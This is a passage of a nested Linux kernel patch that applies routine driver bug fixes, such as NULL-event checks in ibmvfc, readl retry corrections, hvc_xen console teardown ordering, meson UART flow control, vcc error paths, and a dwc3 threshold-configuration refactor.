+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.passthru;
+ 
+@@ -2301,6 +2325,11 @@ static int ibmvfc_reset_device(struct scsi_device *sdev, int type, char *desc)
+ 		else
+ 			evt = ibmvfc_get_event(&vhost->crq);
+ 
++		if (!evt) {
++			spin_unlock_irqrestore(vhost->host->host_lock, flags);
++			return -ENOMEM;
++		}
++
+ 		ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_CMD_FORMAT);
+ 		tmf = ibmvfc_init_vfc_cmd(evt, sdev);
+ 		iu = ibmvfc_get_fcp_iu(vhost, tmf);
+@@ -2504,6 +2533,8 @@ static struct ibmvfc_event *ibmvfc_init_tmf(struct ibmvfc_queue *queue,
+ 	struct ibmvfc_tmf *tmf;
+ 
+ 	evt = ibmvfc_get_event(queue);
++	if (!evt)
++		return NULL;
+ 	ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_MAD_FORMAT);
+ 
+ 	tmf = &evt->iu.tmf;
+@@ -2560,6 +2591,11 @@ static int ibmvfc_cancel_all_mq(struct scsi_device *sdev, int type)
+ 
+ 		if (found_evt && vhost->logged_in) {
+ 			evt = ibmvfc_init_tmf(&queues[i], sdev, type);
++			if (!evt) {
++				spin_unlock(queues[i].q_lock);
++				spin_unlock_irqrestore(vhost->host->host_lock, flags);
++				return -ENOMEM;
++			}
+ 			evt->sync_iu = &queues[i].cancel_rsp;
+ 			ibmvfc_send_event(evt, vhost, default_timeout);
+ 			list_add_tail(&evt->cancel, &cancelq);
+@@ -2773,6 +2809,10 @@ static int ibmvfc_abort_task_set(struct scsi_device *sdev)
+ 
+ 	if (vhost->state == IBMVFC_ACTIVE) {
+ 		evt = ibmvfc_get_event(&vhost->crq);
++		if (!evt) {
++			spin_unlock_irqrestore(vhost->host->host_lock, flags);
++			return -ENOMEM;
++		}
+ 		ibmvfc_init_event(evt, ibmvfc_sync_completion, IBMVFC_CMD_FORMAT);
+ 		tmf = ibmvfc_init_vfc_cmd(evt, sdev);
+ 		iu = ibmvfc_get_fcp_iu(vhost, tmf);
+@@ -4031,6 +4071,12 @@ static void ibmvfc_tgt_send_prli(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_prli_done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+@@ -4138,6 +4184,12 @@ static void ibmvfc_tgt_send_plogi(struct ibmvfc_target *tgt)
+ 	kref_get(&tgt->kref);
+ 	tgt->logo_rcvd = 0;
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_plogi_done, IBMVFC_MAD_FORMAT);
+@@ -4214,6 +4266,8 @@ static struct ibmvfc_event *__ibmvfc_tgt_get_implicit_logout_evt(struct ibmvfc_t
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt)
++		return NULL;
+ 	ibmvfc_init_event(evt, done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+ 	mad = &evt->iu.implicit_logout;
+@@ -4241,6 +4295,13 @@ static void ibmvfc_tgt_implicit_logout(struct ibmvfc_target *tgt)
+ 	vhost->discovery_threads++;
+ 	evt = __ibmvfc_tgt_get_implicit_logout_evt(tgt,
+ 						   ibmvfc_tgt_implicit_logout_done);
++	if (!evt) {
++		vhost->discovery_threads--;
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	if (ibmvfc_send_event(evt, vhost, default_timeout)) {
+@@ -4380,6 +4441,12 @@ static void ibmvfc_tgt_move_login(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_DEL_RPORT);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_INIT_WAIT);
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_move_login_done, IBMVFC_MAD_FORMAT);
+@@ -4546,6 +4613,14 @@ static void ibmvfc_adisc_timeout(struct timer_list *t)
+ 	vhost->abort_threads++;
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		tgt_err(tgt, "Failed to get cancel event for ADISC.\n");
++		vhost->abort_threads--;
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		spin_unlock_irqrestore(vhost->host->host_lock, flags);
++		return;
++	}
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_adisc_cancel_done, IBMVFC_MAD_FORMAT);
+ 
+ 	evt->tgt = tgt;
+@@ -4596,6 +4671,12 @@ static void ibmvfc_tgt_adisc(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_adisc_done, IBMVFC_MAD_FORMAT);
+ 	evt->tgt = tgt;
+@@ -4699,6 +4780,12 @@ static void ibmvfc_tgt_query_target(struct ibmvfc_target *tgt)
+ 
+ 	kref_get(&tgt->kref);
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_set_tgt_action(tgt, IBMVFC_TGT_ACTION_NONE);
++		kref_put(&tgt->kref, ibmvfc_release_tgt);
++		__ibmvfc_reset_host(vhost);
++		return;
++	}
+ 	vhost->discovery_threads++;
+ 	evt->tgt = tgt;
+ 	ibmvfc_init_event(evt, ibmvfc_tgt_query_target_done, IBMVFC_MAD_FORMAT);
+@@ -4871,6 +4958,13 @@ static void ibmvfc_discover_targets(struct ibmvfc_host *vhost)
+ {
+ 	struct ibmvfc_discover_targets *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
++
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Discover Targets failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_discover_targets_done, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.discover_targets;
+@@ -4948,8 +5042,15 @@ static void ibmvfc_channel_setup(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_scsi_channels *scrqs = &vhost->scsi_scrqs;
+ 	unsigned int num_channels =
+ 		min(vhost->client_scsi_channels, vhost->max_vios_scsi_channels);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
+ 	int i;
+ 
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Channel Setup failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	memset(setup_buf, 0, sizeof(*setup_buf));
+ 	if (num_channels == 0)
+ 		setup_buf->flags = cpu_to_be32(IBMVFC_CANCEL_CHANNELS);
+@@ -5011,6 +5112,13 @@ static void ibmvfc_channel_enquiry(struct ibmvfc_host *vhost)
+ {
+ 	struct ibmvfc_channel_enquiry *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
++	int level = IBMVFC_DEFAULT_LOG_LEVEL;
++
++	if (!evt) {
++		ibmvfc_log(vhost, level, "Channel Enquiry failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
+ 
+ 	ibmvfc_init_event(evt, ibmvfc_channel_enquiry_done, IBMVFC_MAD_FORMAT);
+ 	mad = &evt->iu.channel_enquiry;
+@@ -5133,6 +5241,12 @@ static void ibmvfc_npiv_login(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_npiv_login_mad *mad;
+ 	struct ibmvfc_event *evt = ibmvfc_get_event(&vhost->crq);
+ 
++	if (!evt) {
++		ibmvfc_dbg(vhost, "NPIV Login failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	ibmvfc_gather_partition_info(vhost);
+ 	ibmvfc_set_login_info(vhost);
+ 	ibmvfc_init_event(evt, ibmvfc_npiv_login_done, IBMVFC_MAD_FORMAT);
+@@ -5197,6 +5311,12 @@ static void ibmvfc_npiv_logout(struct ibmvfc_host *vhost)
+ 	struct ibmvfc_event *evt;
+ 
+ 	evt = ibmvfc_get_event(&vhost->crq);
++	if (!evt) {
++		ibmvfc_dbg(vhost, "NPIV Logout failed: no available events\n");
++		ibmvfc_hard_reset_host(vhost);
++		return;
++	}
++
+ 	ibmvfc_init_event(evt, ibmvfc_npiv_logout_done, IBMVFC_MAD_FORMAT);
+ 
+ 	mad = &evt->iu.npiv_logout;
+diff --git a/drivers/scsi/libfc/fc_lport.c b/drivers/scsi/libfc/fc_lport.c
+index 9c02c9523c4d4..ab06e9aeb613e 100644
+--- a/drivers/scsi/libfc/fc_lport.c
++++ b/drivers/scsi/libfc/fc_lport.c
+@@ -241,6 +241,12 @@ static void fc_lport_ptp_setup(struct fc_lport *lport,
+ 	}
+ 	mutex_lock(&lport->disc.disc_mutex);
+ 	lport->ptp_rdata = fc_rport_create(lport, remote_fid);
++	if (!lport->ptp_rdata) {
++		printk(KERN_WARNING "libfc: Failed to setup lport 0x%x\n",
++			lport->port_id);
++		mutex_unlock(&lport->disc.disc_mutex);
++		return;
++	}
+ 	kref_get(&lport->ptp_rdata->kref);
+ 	lport->ptp_rdata->ids.port_name = remote_wwpn;
+ 	lport->ptp_rdata->ids.node_name = remote_wwnn;
+diff --git a/drivers/scsi/megaraid/megaraid_sas_base.c b/drivers/scsi/megaraid/megaraid_sas_base.c
+index e392a984c7b87..37208bc08c667 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_base.c
++++ b/drivers/scsi/megaraid/megaraid_sas_base.c
+@@ -263,13 +263,13 @@ u32 megasas_readl(struct megasas_instance *instance,
+ 	 * Fusion registers could intermittently return all zeroes.
+ 	 * This behavior is transient in nature and subsequent reads will
+ 	 * return valid value. As a workaround in driver, retry readl for
+-	 * upto three times until a non-zero value is read.
++	 * up to thirty times until a non-zero value is read.
+ 	 */
+ 	if (instance->adapter_type == AERO_SERIES) {
+ 		do {
+ 			ret_val = readl(addr);
+ 			i++;
+-		} while (ret_val == 0 && i < 3);
++		} while (ret_val == 0 && i < 30);
+ 		return ret_val;
+ 	} else {
+ 		return readl(addr);
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 2093888f154e0..809be43f440dc 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -224,8 +224,8 @@ _base_readl_ext_retry(const volatile void __iomem *addr)
+ 
+ 	for (i = 0 ; i < 30 ; i++) {
+ 		ret_val = readl(addr);
+-		if (ret_val == 0)
+-			continue;
++		if (ret_val != 0)
++			break;
+ 	}
+ 
+ 	return ret_val;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index b33ffec1cb75e..25ca0544b9639 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -1831,8 +1831,16 @@ static void qla2x00_abort_srb(struct qla_qpair *qp, srb_t *sp, const int res,
+ 		}
+ 
+ 		spin_lock_irqsave(qp->qp_lock_ptr, *flags);
+-		if (ret_cmd && blk_mq_request_started(scsi_cmd_to_rq(cmd)))
+-			sp->done(sp, res);
++		switch (sp->type) {
++		case SRB_SCSI_CMD:
++			if (ret_cmd && blk_mq_request_started(scsi_cmd_to_rq(cmd)))
++				sp->done(sp, res);
++			break;
++		default:
++			if (ret_cmd)
++				sp->done(sp, res);
++			break;
++		}
+ 	} else {
+ 		sp->done(sp, res);
+ 	}
+diff --git a/drivers/soc/bcm/bcm2835-power.c b/drivers/soc/bcm/bcm2835-power.c
+index 5bcd047768b60..cbcd1298ef5bd 100644
+--- a/drivers/soc/bcm/bcm2835-power.c
++++ b/drivers/soc/bcm/bcm2835-power.c
+@@ -175,7 +175,7 @@ static int bcm2835_asb_control(struct bcm2835_power *power, u32 reg, bool enable
+ 	}
+ 	writel(PM_PASSWORD | val, base + reg);
+ 
+-	while (readl(base + reg) & ASB_ACK) {
++	while (!!(readl(base + reg) & ASB_ACK) == enable) {
+ 		cpu_relax();
+ 		if (ktime_get_ns() - start >= 1000)
+ 			return -ETIMEDOUT;
+diff --git a/drivers/soc/imx/gpc.c b/drivers/soc/imx/gpc.c
+index 90a8b2c0676ff..419ed15cc10c4 100644
+--- a/drivers/soc/imx/gpc.c
++++ b/drivers/soc/imx/gpc.c
+@@ -498,6 +498,7 @@ static int imx_gpc_probe(struct platform_device *pdev)
+ 
+ 			pd_pdev->dev.parent = &pdev->dev;
+ 			pd_pdev->dev.of_node = np;
++			pd_pdev->dev.fwnode = of_fwnode_handle(np);
+ 
+ 			ret = platform_device_add(pd_pdev);
+ 			if (ret) {
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 2a1096dab63d3..9ebdd0cd0b1cf 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -141,7 +141,7 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16-k0xxx"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16"),
+ 		},
+ 		.driver_data = (void *)hp_omen_16,
+ 	},
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 8c2ee431fcde8..4ab3803e10c83 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -30,6 +30,9 @@ static void quirk_usb3_maximum_bandwidth(struct tb_switch *sw)
+ {
+ 	struct tb_port *port;
+ 
++	if (tb_switch_is_icm(sw))
++		return;
++
+ 	tb_switch_for_each_port(sw, port) {
+ 		if (!tb_port_is_usb3_down(port))
+ 			continue;
+diff --git a/drivers/tty/hvc/hvc_xen.c b/drivers/tty/hvc/hvc_xen.c
+index d9d0232753286..281bc83acfadd 100644
+--- a/drivers/tty/hvc/hvc_xen.c
++++ b/drivers/tty/hvc/hvc_xen.c
+@@ -377,18 +377,21 @@ void xen_console_resume(void)
+ #ifdef CONFIG_HVC_XEN_FRONTEND
+ static void xencons_disconnect_backend(struct xencons_info *info)
+ {
+-	if (info->irq > 0)
+-		unbind_from_irqhandler(info->irq, NULL);
+-	info->irq = 0;
++	if (info->hvc != NULL)
++		hvc_remove(info->hvc);
++	info->hvc = NULL;
++	if (info->irq > 0) {
++		evtchn_put(info->evtchn);
++		info->irq = 0;
++		info->evtchn = 0;
++	}
++	/* evtchn_put() will also close it so this is only an error path */
+ 	if (info->evtchn > 0)
+ 		xenbus_free_evtchn(info->xbdev, info->evtchn);
+ 	info->evtchn = 0;
+ 	if (info->gntref > 0)
+ 		gnttab_free_grant_references(info->gntref);
+ 	info->gntref = 0;
+-	if (info->hvc != NULL)
+-		hvc_remove(info->hvc);
+-	info->hvc = NULL;
+ }
+ 
+ static void xencons_free(struct xencons_info *info)
+@@ -433,7 +436,7 @@ static int xencons_connect_backend(struct xenbus_device *dev,
+ 	if (ret)
+ 		return ret;
+ 	info->evtchn = evtchn;
+-	irq = bind_interdomain_evtchn_to_irq_lateeoi(dev, evtchn);
++	irq = bind_evtchn_to_irq_lateeoi(evtchn);
+ 	if (irq < 0)
+ 		return irq;
+ 	info->irq = irq;
+@@ -553,10 +556,23 @@ static void xencons_backend_changed(struct xenbus_device *dev,
+ 		if (dev->state == XenbusStateClosed)
+ 			break;
+ 		fallthrough;	/* Missed the backend's CLOSING state */
+-	case XenbusStateClosing:
++	case XenbusStateClosing: {
++		struct xencons_info *info = dev_get_drvdata(&dev->dev);;
++
++		/*
++		 * Don't tear down the evtchn and grant ref before the other
++		 * end has disconnected, but do stop userspace from trying
++		 * to use the device before we allow the backend to close.
++		 */
++		if (info->hvc) {
++			hvc_remove(info->hvc);
++			info->hvc = NULL;
++		}
++
+ 		xenbus_frontend_closed(dev);
+ 		break;
+ 	}
++	}
+ }
+ 
+ static const struct xenbus_device_id xencons_ids[] = {
+@@ -588,7 +604,7 @@ static int __init xen_hvc_init(void)
+ 		ops = &dom0_hvc_ops;
+ 		r = xen_initial_domain_console_init();
+ 		if (r < 0)
+-			return r;
++			goto register_fe;
+ 		info = vtermno_to_xencons(HVC_COOKIE);
+ 	} else {
+ 		ops = &domU_hvc_ops;
+@@ -597,7 +613,7 @@ static int __init xen_hvc_init(void)
+ 		else
+ 			r = xen_pv_console_init();
+ 		if (r < 0)
+-			return r;
++			goto register_fe;
+ 
+ 		info = vtermno_to_xencons(HVC_COOKIE);
+ 		info->irq = bind_evtchn_to_irq_lateeoi(info->evtchn);
+@@ -616,12 +632,13 @@ static int __init xen_hvc_init(void)
+ 		list_del(&info->list);
+ 		spin_unlock_irqrestore(&xencons_lock, flags);
+ 		if (info->irq)
+-			unbind_from_irqhandler(info->irq, NULL);
++			evtchn_put(info->evtchn);
+ 		kfree(info);
+ 		return r;
+ 	}
+ 
+ 	r = 0;
++ register_fe:
+ #ifdef CONFIG_HVC_XEN_FRONTEND
+ 	r = xenbus_register_frontend(&xencons_driver);
+ #endif
+diff --git a/drivers/tty/serial/meson_uart.c b/drivers/tty/serial/meson_uart.c
+index 056243c12836c..8f6d54c04b9ba 100644
+--- a/drivers/tty/serial/meson_uart.c
++++ b/drivers/tty/serial/meson_uart.c
+@@ -380,10 +380,14 @@ static void meson_uart_set_termios(struct uart_port *port,
+ 	else
+ 		val |= AML_UART_STOP_BIT_1SB;
+ 
+-	if (cflags & CRTSCTS)
+-		val &= ~AML_UART_TWO_WIRE_EN;
+-	else
++	if (cflags & CRTSCTS) {
++		if (port->flags & UPF_HARD_FLOW)
++			val &= ~AML_UART_TWO_WIRE_EN;
++		else
++			termios->c_cflag &= ~CRTSCTS;
++	} else {
+ 		val |= AML_UART_TWO_WIRE_EN;
++	}
+ 
+ 	writel(val, port->membase + AML_UART_CONTROL);
+ 
+@@ -698,6 +702,7 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 	u32 fifosize = 64; /* Default is 64, 128 for EE UART_0 */
+ 	int ret = 0;
+ 	int irq;
++	bool has_rtscts;
+ 
+ 	if (pdev->dev.of_node)
+ 		pdev->id = of_alias_get_id(pdev->dev.of_node, "serial");
+@@ -725,6 +730,7 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 		return irq;
+ 
+ 	of_property_read_u32(pdev->dev.of_node, "fifo-size", &fifosize);
++	has_rtscts = of_property_read_bool(pdev->dev.of_node, "uart-has-rtscts");
+ 
+ 	if (meson_ports[pdev->id]) {
+ 		dev_err(&pdev->dev, "port %d already allocated\n", pdev->id);
+@@ -744,6 +750,8 @@ static int meson_uart_probe(struct platform_device *pdev)
+ 	port->mapsize = resource_size(res_mem);
+ 	port->irq = irq;
+ 	port->flags = UPF_BOOT_AUTOCONF | UPF_LOW_LATENCY;
++	if (has_rtscts)
++		port->flags |= UPF_HARD_FLOW;
+ 	port->has_sysrq = IS_ENABLED(CONFIG_SERIAL_MESON_CONSOLE);
+ 	port->dev = &pdev->dev;
+ 	port->line = pdev->id;
+diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
+index d2b2720db6ca7..248067197287a 100644
+--- a/drivers/tty/sysrq.c
++++ b/drivers/tty/sysrq.c
+@@ -263,13 +263,14 @@ static void sysrq_handle_showallcpus(int key)
+ 		if (in_hardirq())
+ 			regs = get_irq_regs();
+ 
+-		pr_info("CPU%d:\n", smp_processor_id());
++		pr_info("CPU%d:\n", get_cpu());
+ 		if (regs)
+ 			show_regs(regs);
+ 		else
+ 			show_stack(NULL, NULL, KERN_INFO);
+ 
+ 		schedule_work(&sysrq_showallcpus);
++		put_cpu();
+ 	}
+ }
+ 
+diff --git a/drivers/tty/vcc.c b/drivers/tty/vcc.c
+index 34ba6e54789a7..b8b832c75b856 100644
+--- a/drivers/tty/vcc.c
++++ b/drivers/tty/vcc.c
+@@ -579,18 +579,22 @@ static int vcc_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 		return -ENOMEM;
+ 
+ 	name = kstrdup(dev_name(&vdev->dev), GFP_KERNEL);
++	if (!name) {
++		rv = -ENOMEM;
++		goto free_port;
++	}
+ 
+ 	rv = vio_driver_init(&port->vio, vdev, VDEV_CONSOLE_CON, vcc_versions,
+ 			     ARRAY_SIZE(vcc_versions), NULL, name);
+ 	if (rv)
+-		goto free_port;
++		goto free_name;
+ 
+ 	port->vio.debug = vcc_dbg_vio;
+ 	vcc_ldc_cfg.debug = vcc_dbg_ldc;
+ 
+ 	rv = vio_ldc_alloc(&port->vio, &vcc_ldc_cfg, port);
+ 	if (rv)
+-		goto free_port;
++		goto free_name;
+ 
+ 	spin_lock_init(&port->lock);
+ 
+@@ -624,6 +628,11 @@ static int vcc_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 		goto unreg_tty;
+ 	}
+ 	port->domain = kstrdup(domain, GFP_KERNEL);
++	if (!port->domain) {
++		rv = -ENOMEM;
++		goto unreg_tty;
++	}
++
+ 
+ 	mdesc_release(hp);
+ 
+@@ -653,8 +662,9 @@ free_table:
+ 	vcc_table_remove(port->index);
+ free_ldc:
+ 	vio_ldc_free(&port->vio);
+-free_port:
++free_name:
+ 	kfree(name);
++free_port:
+ 	kfree(port);
+ 
+ 	return rv;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 57e2f4cc744f7..a811db88eedae 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -1111,6 +1111,111 @@ static void dwc3_set_power_down_clk_scale(struct dwc3 *dwc)
+ 	}
+ }
+ 
++static void dwc3_config_threshold(struct dwc3 *dwc)
++{
++	u32 reg;
++	u8 rx_thr_num;
++	u8 rx_maxburst;
++	u8 tx_thr_num;
++	u8 tx_maxburst;
++
++	/*
++	 * Must config both number of packets and max burst settings to enable
++	 * RX and/or TX threshold.
++	 */
++	if (!DWC3_IP_IS(DWC3) && dwc->dr_mode == USB_DR_MODE_HOST) {
++		rx_thr_num = dwc->rx_thr_num_pkt_prd;
++		rx_maxburst = dwc->rx_max_burst_prd;
++		tx_thr_num = dwc->tx_thr_num_pkt_prd;
++		tx_maxburst = dwc->tx_max_burst_prd;
++
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC31_RXTHRNUMPKTSEL_PRD;
++
++			reg &= ~DWC31_RXTHRNUMPKT_PRD(~0);
++			reg |= DWC31_RXTHRNUMPKT_PRD(rx_thr_num);
++
++			reg &= ~DWC31_MAXRXBURSTSIZE_PRD(~0);
++			reg |= DWC31_MAXRXBURSTSIZE_PRD(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC31_TXTHRNUMPKTSEL_PRD;
++
++			reg &= ~DWC31_TXTHRNUMPKT_PRD(~0);
++			reg |= DWC31_TXTHRNUMPKT_PRD(tx_thr_num);
++
++			reg &= ~DWC31_MAXTXBURSTSIZE_PRD(~0);
++			reg |= DWC31_MAXTXBURSTSIZE_PRD(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	}
++
++	rx_thr_num = dwc->rx_thr_num_pkt;
++	rx_maxburst = dwc->rx_max_burst;
++	tx_thr_num = dwc->tx_thr_num_pkt;
++	tx_maxburst = dwc->tx_max_burst;
++
++	if (DWC3_IP_IS(DWC3)) {
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC3_GRXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC3_GRXTHRCFG_RXPKTCNT(~0);
++			reg |= DWC3_GRXTHRCFG_RXPKTCNT(rx_thr_num);
++
++			reg &= ~DWC3_GRXTHRCFG_MAXRXBURSTSIZE(~0);
++			reg |= DWC3_GRXTHRCFG_MAXRXBURSTSIZE(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC3_GTXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC3_GTXTHRCFG_TXPKTCNT(~0);
++			reg |= DWC3_GTXTHRCFG_TXPKTCNT(tx_thr_num);
++
++			reg &= ~DWC3_GTXTHRCFG_MAXTXBURSTSIZE(~0);
++			reg |= DWC3_GTXTHRCFG_MAXTXBURSTSIZE(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	} else {
++		if (rx_thr_num && rx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
++			reg |= DWC31_GRXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC31_GRXTHRCFG_RXPKTCNT(~0);
++			reg |= DWC31_GRXTHRCFG_RXPKTCNT(rx_thr_num);
++
++			reg &= ~DWC31_GRXTHRCFG_MAXRXBURSTSIZE(~0);
++			reg |= DWC31_GRXTHRCFG_MAXRXBURSTSIZE(rx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
++		}
++
++		if (tx_thr_num && tx_maxburst) {
++			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
++			reg |= DWC31_GTXTHRCFG_PKTCNTSEL;
++
++			reg &= ~DWC31_GTXTHRCFG_TXPKTCNT(~0);
++			reg |= DWC31_GTXTHRCFG_TXPKTCNT(tx_thr_num);
++
++			reg &= ~DWC31_GTXTHRCFG_MAXTXBURSTSIZE(~0);
++			reg |= DWC31_GTXTHRCFG_MAXTXBURSTSIZE(tx_maxburst);
++
++			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
++		}
++	}
++}
++
+ /**
+  * dwc3_core_init - Low-level initialization of DWC3 Core
+  * @dwc: Pointer to our controller context structure
+@@ -1278,42 +1383,7 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 		dwc3_writel(dwc->regs, DWC3_GUCTL1, reg);
+ 	}
+ 
+-	/*
+-	 * Must config both number of packets and max burst settings to enable
+-	 * RX and/or TX threshold.
+-	 */
+-	if (!DWC3_IP_IS(DWC3) && dwc->dr_mode == USB_DR_MODE_HOST) {
+-		u8 rx_thr_num = dwc->rx_thr_num_pkt_prd;
+-		u8 rx_maxburst = dwc->rx_max_burst_prd;
+-		u8 tx_thr_num = dwc->tx_thr_num_pkt_prd;
+-		u8 tx_maxburst = dwc->tx_max_burst_prd;
+-
+-		if (rx_thr_num && rx_maxburst) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GRXTHRCFG);
+-			reg |= DWC31_RXTHRNUMPKTSEL_PRD;
+-
+-			reg &= ~DWC31_RXTHRNUMPKT_PRD(~0);
+-			reg |= DWC31_RXTHRNUMPKT_PRD(rx_thr_num);
+-
+-			reg &= ~DWC31_MAXRXBURSTSIZE_PRD(~0);
+-			reg |= DWC31_MAXRXBURSTSIZE_PRD(rx_maxburst);
+-
+-			dwc3_writel(dwc->regs, DWC3_GRXTHRCFG, reg);
+-		}
+-
+-		if (tx_thr_num && tx_maxburst) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GTXTHRCFG);
+-			reg |= DWC31_TXTHRNUMPKTSEL_PRD;
+-
+-			reg &= ~DWC31_TXTHRNUMPKT_PRD(~0);
+-			reg |= DWC31_TXTHRNUMPKT_PRD(tx_thr_num);
+-
+-			reg &= ~DWC31_MAXTXBURSTSIZE_PRD(~0);
+-			reg |= DWC31_MAXTXBURSTSIZE_PRD(tx_maxburst);
+-
+-			dwc3_writel(dwc->regs, DWC3_GTXTHRCFG, reg);
+-		}
+-	}
++	dwc3_config_threshold(dwc);
+ 
+ 	return 0;
+ 
